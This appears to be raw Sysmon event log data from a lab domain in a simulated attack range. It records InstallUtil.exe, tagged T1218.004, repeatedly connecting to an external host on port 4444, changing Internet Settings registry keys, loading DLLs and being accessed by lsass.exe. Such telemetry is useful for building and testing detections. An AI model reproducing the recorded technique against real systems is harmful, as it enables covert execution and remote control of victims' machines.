16:50:59.321{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59247-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 354300x800000000000000057562657Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:59.319{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59246-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 12241200x800000000000000057562711Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:50:31.781{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 354300x800000000000000057562718Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:51:04.337{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59254-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 354300x800000000000000057562717Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:51:04.334{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59253-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 354300x800000000000000057562722Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:51:04.339{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59255-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 12241200x800000000000000057562733Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:50:36.796{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 354300x800000000000000057562743Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:51:09.353{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59259-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 354300x800000000000000057562742Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:51:09.352{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59258-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 354300x800000000000000057562741Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:51:09.350{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59257-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 12241200x800000000000000057562752Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:50:41.816{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 354300x800000000000000057562761Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:51:14.374{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59262-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 354300x800000000000000057562760Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:51:14.372{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59261-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 354300x800000000000000057562759Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:51:14.370{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59260-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 12241200x800000000000000057562772Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:50:46.832{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 354300x800000000000000057562780Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:51:19.389{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59267-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 354300x800000000000000057562779Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:51:19.388{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59266-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 354300x800000000000000057562778Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:51:19.386{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59265-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 12241200x800000000000000057562790Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:50:51.847{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 354300x800000000000000057562834Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:51:24.407{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59271-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 354300x800000000000000057562833Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:51:24.405{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59270-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 354300x800000000000000057562832Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:51:24.403{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59269-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 12241200x800000000000000057562845Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:50:56.863{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 354300x800000000000000057562852Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:51:29.421{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59276-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 354300x800000000000000057562851Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:51:29.419{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59275-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 354300x800000000000000057562850Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:51:29.417{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59274-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 12241200x800000000000000057562878Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:51:01.873{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 354300x800000000000000057562888Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:51:34.432{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59280-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 354300x800000000000000057562887Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:51:34.430{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59279-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 354300x800000000000000057562886Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:51:34.427{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59278-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 534500x800000000000000057563065Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:51:06.889{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe 534500x800000000000000057594291Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.197{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe 734700x800000000000000057594290Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.182{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Servd1dec626#\367b724a8a8d7a8816e8029637e9af91\System.ServiceModel.Internals.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSystem.ServiceModel.Internals.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.ServiceModel.Internals.dllMD5=D9D712B2F98C74C18C71B40FBFF12C72,SHA256=C1CB9C1223FFBBFA879B7972A34AD437C308829152CFF855802A6350C75B46A7false-Unavailable 734700x800000000000000057594289Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.166{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\SMDiagnostics\32788288a07982cb10ab4196907ef578\SMDiagnostics.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSMDiagnostics.dllMicrosoft® .NET FrameworkMicrosoft CorporationSMDiagnostics.dllMD5=6520C012D5164F22C0A4F96E82F7979A,SHA256=BD1F07E923DBA63862A75A4D312268EFF3391C155C1103B20964DF8F7E21D5C1false-Unavailable 11241100x800000000000000057594288Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.166{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Users\Administrator\AppData\Local\Temp\2\T1218.004.InstallState2021-11-12 17:23:45.166 734700x800000000000000057594287Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.166{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runteb92aa12#\8a6f1fd5072bb947ca74e50ce391a3d3\System.Runtime.Serialization.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSystem.Runtime.Serialization.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Runtime.Serialization.dllMD5=D2D5D6F2005BB57034DBE003EE9D14A0,SHA256=53E2A4CB20464A9CDCE924F9513882F3DA575DBE10B68C9437EA37C074AEA798false-Unavailable 734700x800000000000000057594286Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.166{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057594285Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.166{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057594284Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.166{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 734700x800000000000000057594283Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.166{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057594282Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.166{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 734700x800000000000000057594281Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.166{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\shell32.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=837B8644B9CE47EC28152E7D764886E0,SHA256=C5BA64473FB38E6B4592EAFA642AF82715CBC676190985D8D8D4150CE840044FtrueMicrosoft WindowsValid 734700x800000000000000057594280Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.166{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\e1c9eb2e855d26a67dbf39e6236430de\System.Xml.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Xml.dllMD5=695EB4BE24FC9DB279F2427D31AD35D4,SHA256=014EDA5BD7025A6F01BEA1F6E05663FE4BCE64FA95B7378EBF9C827991B32E64false-Unavailable 734700x800000000000000057594279Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.166{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\5b778442ed2d60a5de14f752a124bf1a\System.Configuration.ni.dll4.8.4190.0 built by: NET48REL1LAST_BSystem.Configuration.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.dllMD5=9EAA59368783AFE4107F28B6ED8AB1E6,SHA256=BBAC50983BA9B2EDA9CBA8FD0F1DCABF71D24D736A973BA164AF6917A3FC2E7Ffalse-Unavailable 734700x800000000000000057594278Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.166{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\625a7ccd665c33cee4988e3cd136b902\System.Core.ni.dll4.8.4395.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Core.dllMD5=27741782AAECFE54A201896D93BA1C9A,SHA256=7389517EE682897300DE398245D2C3EE37E5060CF6320138430A8AA86E6E737Bfalse-Unavailable 734700x800000000000000057594277Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.151{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057594276Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.151{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057594275Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.151{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x800000000000000057594274Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.151{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x800000000000000057594273Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.151{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\windows.storage.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=1D7997E3AFC26B85024D33F835E18056,SHA256=B2376967E156D4971FB66059F6367030AF937943D2EBF80AF856E643B6E95BBFtrueMicrosoft WindowsValid 13241300x800000000000000057594272Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:23:45.151{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057594271Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:23:45.151{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 13241300x800000000000000057594270Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:23:45.151{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057594269Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:23:45.151{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 10341000x800000000000000057594268Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.151{8B6011A9-886B-6164-0B00-00000000F101}6486664C:\Windows\system32\lsass.exe{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057594267Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.151{8B6011A9-886B-6164-0B00-00000000F101}6486664C:\Windows\system32\lsass.exe{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057594266Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.151{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 12241200x800000000000000057594265Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 17:23:45.151{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap 734700x800000000000000057594264Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.151{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 